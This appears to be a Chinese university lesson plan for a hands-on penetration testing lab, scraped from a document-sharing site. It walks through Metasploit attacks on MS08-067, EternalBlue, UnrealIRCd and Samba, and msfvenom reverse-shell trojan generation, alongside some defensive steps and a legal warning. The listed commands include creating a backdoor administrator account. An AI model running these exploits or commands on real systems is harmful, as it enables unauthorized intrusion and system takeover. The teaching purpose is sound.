网络安全与攻防技术实训教程(第3版)教案 第 7 章网络服务渗透攻击教案_第1页
网络安全与攻防技术实训教程(第3版)教案 第 7 章网络服务渗透攻击教案_第2页
网络安全与攻防技术实训教程(第3版)教案 第 7 章网络服务渗透攻击教案_第3页
网络安全与攻防技术实训教程(第3版)教案 第 7 章网络服务渗透攻击教案_第4页
网络安全与攻防技术实训教程(第3版)教案 第 7 章网络服务渗透攻击教案_第5页
已阅读5页,还剩2页未读 继续免费阅读

下载本文档

版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领

文档简介

第7章网络服务渗透攻击教案一、课程基本信息课程名称:网络安全与攻防技术实训授课章节:第7章网络服务渗透攻击授课对象:计算机相关专业学生(网络工程、信息安全方向)授课课时:4课时(每课时40分钟)授课形式:理论讲授+实操+案例分析二、教学目标(一)知识目标掌握Windows系统网络服务类型(NetBIOS、SMB、MsRPC、RDP)及常见漏洞(MS08-067、MS17-010)的攻击原理。理解MS08-067漏洞(RPC服务缺陷)、永恒之蓝漏洞(SMB协议缺陷)及WannaCry勒索病毒的传播逻辑。熟悉Linux系统网络服务(UnrealIRCd、Samba)的漏洞特点及渗透攻击原理。明确网络服务渗透攻击的防范措施(打补丁、关端口)及合法测试的法律边界。(二)技能目标能用Metasploit渗透攻击MS08-067漏洞,获取WinXP主机的meterpreter会话,并创建管理员用户、开启远程桌面。能利用Metasploit攻击MS17-010漏洞(永恒之蓝),并通过修改注册表关闭445端口消除漏洞。能用msfvenom生成木马,实现对Windows10系统的渗透攻击,获取meterpreter会话。能渗透攻击Linux系统的UnrealIRCd服务和Samba服务,获取命令行shell。(三)素质目标树立“合法攻击”意识,结合俄乌冲突网络战案例,明确未经授权渗透攻击的法律风险与社会危害。培养“攻防对抗”思维,通过漏洞攻击与防御实操,理解“漏洞修复及时性”对系统安全的重要性。增强责任意识,认识到网络服务漏洞对关键基础设施的威胁,建立“以防御为主、攻击为辅”的安全理念。三、教学重难点(一)教学重点MS08-067漏洞的渗透攻击(Metasploit模块配置、meterpreter会话操作)。MS17-010漏洞攻击与防御(永恒之蓝模块使用、445端口关闭)。Windows10系统渗透(msfvenom木马生成、监听模块配置)。Linux系统UnrealIRCd、Samba服务的漏洞攻击(模块选择、shell获取)。(二)教学难点Metasploit攻击载荷(payload)的选择逻辑(如WindowsXP对应32位payload)。修改注册表关闭445端口的操作细节(QWORD值创建、服务禁用)。Linux系统命令行shell的交互(无meterpreter时的命令执行)。四、教学准备硬件:教师机(带投影)、学生机(内存≥8GB,已搭建各项目所需虚拟系统:Kali、WinXP、Win7、Win10、Metasploitable2,预装VMwareWorkstation)。软件:KaliLinux系统(含Metasploit、msfvenom、nmap)。五、教学过程设计第1课时:Windows系统漏洞攻击(MS08-067)一、课程导入(5分钟)结合MS08-067漏洞案例,提问:“2008年爆发的MS08-067漏洞为何能影响大量Windows系统?攻击者如何利用该漏洞控制目标主机?”引出本节课主题。明确本节课目标:掌握MS08-067漏洞原理,完成渗透攻击实操。二、理论讲授(15分钟)Windows系统核心网络服务重点讲解与漏洞相关的服务:SMB服务:运行于445端口,用于文件共享,是MS08-067、MS17-010漏洞的攻击目标;RPC服务:远程过程调用,MS08-067漏洞因RPC服务处理恶意请求时缓冲区溢出导致。MS08-067漏洞原理漏洞成因:WindowsServer服务处理RPC请求时存在缺陷,恶意请求触发缓冲区溢出,可远程执行代码;影响范围:WinXP、Win2000、Win2003等系统,攻击者可获取SYSTEM权限。三、实操(18分钟)任务:MS08-067漏洞攻击教师演示:启动Metasploit:执行“msfconsole”,搜索模块“searchms08-067”,启用模块“useexploit/windows/smb/ms08_067_netapi”;配置参数:设置目标主机“setrhosts0”、监听主机“setlhost0”、目标系统类型“settarget10”(简体中文WinXP);实施攻击:执行“exploit”,获取meterpreter会话;后续操作:执行“shell”获取命令行,添加管理员用户“netuserremote1234/add”,提升权限“netlocalgroupadministratorsremote/add”,修改注册表开启远程桌面。学生操作:分组完成攻击,记录meterpreter会话及用户创建结果,教师指导“目标类型设置错误”“注册表命令格式错误”等问题。四、课堂小结(2分钟)回顾核心:MS08-067漏洞利用RPC服务缺陷,Metasploit配置关键参数(rhosts、lhost、target)。布置任务:预习MS17-010漏洞(永恒之蓝),预告下节课实操。第2课时:Windows系统漏洞攻击与防御(MS17-010)一、复习回顾(5分钟)快速提问:“为何要设置target为10?”(答案:匹配简体中文WinXP系统,确保攻击兼容性)。过渡:“2017年永恒之蓝漏洞引发WannaCry勒索病毒全球爆发,本节课学习该漏洞的攻击与防御”。二、理论讲授(10分钟)永恒之蓝与MS17-010漏洞漏洞成因:WindowsSMB协议存在缺陷,攻击者发送特制数据包可远程执行代码;传播逻辑:永恒之蓝为漏洞利用工具,WannaCry借助该工具大规模传播,加密文件勒索比特币。漏洞防御核心两种方式:安装MS17-010补丁、关闭445端口(通过注册表+服务禁用实现)。三、实操(23分钟)任务1:完成MS17-010漏洞攻击教师演示:漏洞扫描:启用模块“useauxiliary/scanner/smb/smb_ms17_010”,设置rhosts“0”(Win7),执行“run”确认漏洞存在;加载攻击模块:“useexploit/windows/smb/ms17_010_eternalblue”,设置payload“windows/x64/meterpreter/reverse_tcp”,配置rhosts、lhost;实施攻击:执行“exploit”,获取meterpreter会话;开启远程桌面:加载模块“usepost/windows/manage/enable_rdp”,创建用户“hacker”,执行“run”激活RDP。任务2:完成漏洞防御(关闭445端口)教师演示:查看端口:Win7中执行“netstat-an”,确认445端口开放;修改注册表:执行“regedit”,定位到“HKLM\SYSTEM\CurrentControlSet\services\NetBT\Parameters”,新建“SMBDeviceEnabled”(QWORD值,设为0);禁用服务:执行“services.msc”,停止并禁用“Server”服务;验证:重启后执行“netstat-an”,确认445端口关闭。学生操作:分组完成攻击与防御,记录漏洞扫描结果及端口状态变化。四、课堂小结(2分钟)回顾核心:永恒之蓝攻击依赖SMB服务,防御关键是关445端口或打补丁。布置任务:预习Windows10系统渗透,预告下节课实操。第3课时:Windows10系统渗透与Linux系统漏洞基础一、课前引入(5分钟)提问:“Windows10系统安全性较高,攻击者如何通过木马渗透该系统?”引出msfvenom木马生成方法。明确本节课目标:完成Windows10系统渗透,了解Linux系统网络服务漏洞特点。二、理论讲授(10分钟)Windows10渗透原理核心逻辑:用msfvenom生成反弹shell木马,诱使目标运行,Metasploit监听获取会话;关键步骤:关闭Windows实时保护(避免木马被拦截)、启动Apache服务供目标下载木马。Linux系统安全性优势:补丁管理高效、默认权限控制严格、开源架构易发现漏洞;常见漏洞服务:UnrealIRCd(6667端口)、Samba(445端口)。三、实操(23分钟)任务:完成Windows10系统渗透教师演示:生成木马:执行“msfvenom-pwindows/meterpreter/reverse_tcplhost=0lport=6666-fexe-o/var/www/html/hacker.exe”;启动服务:执行“serviceapache2start”,确保木马可通过“0/hacker.exe”访问;配置监听:Metasploit中启用“exploit/multi/handler”,设置payload、lhost、lport,执行“run”;诱使运行:Win10关闭实时保护,下载并运行木马,Kali获取meterpreter会话。学生操作:分组完成渗透,记录会话获取结果,教师指导“Apache服务启动失败”“木马被拦截”等问题。四、课堂小结(2分钟)回顾核心:msfvenom生成木马是Windows10渗透的常用手段,需关闭目标安全防护。布置预习:预习Linux系统UnrealIRCd、Samba服务攻击,预告下节课实操。第4课时:Linux系统网络服务渗透一、复习回顾(5分钟)快速操作:Kali中执行“nmap-p6667,4450”(Metasploitable2),确认UnrealIRCd(6667端口)、Samba(445端口)服务开放,为渗透铺垫。过渡:“Linux系统虽安全,但第三方服务仍存在漏洞。二、实操(25分钟)任务1:渗透攻击LinuxUnrealIRCd服务教师演示:启动Metasploit:执行“msfconsole”,搜索模块“searchunrealircd”,启用“useexploit/unix/irc/unreal_ircd_3281_backdoor”;配置参数:设置payload“cmd/unix/reverse”、rhosts“0”、lhost“0”;实施攻击:执行“exploit”,获取命令行shell,执行“ifconfig”验证。任务2:渗透攻击LinuxSamba服务教师演示:扫描Samba版本:启用“auxiliary/scanner/smb/smb_version”,确认版本为3.0.20-Debian;启用攻击模块:“useexploit/multi/samba/usermap_script”,设置rhosts、lhost;实施攻击:执行“exploit”,获取命令行shell,执行“whoami”确认权限。学生操作:分组完成两项攻击,记录shell获取结果,教师指导“模块选择错误”“命令执行无提示符”等问题(无meterpreter时直接输入Linux命令)。三、理论讲授:网络服务渗透防御(8分钟)通用防御措施核心措施:及时打补丁(如Samba补丁)、关闭非必要服务(如UnrealIRCd)、限制端口访问(防火墙策略)。法律与道德强调:仅对授权目标测试,未经授权渗透违反《网络安全法》,结合俄乌网络战案例说明攻击危害。四、课堂小结(2分钟)回顾核心:Linux服务渗透多获取命令行shell,需结合服务版本选择对应模块。布置任务:完成【课后习题】,提交Linux服务

温馨提示

  • 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
  • 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
  • 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
  • 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
  • 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
  • 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
  • 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。

评论

0/150

提交评论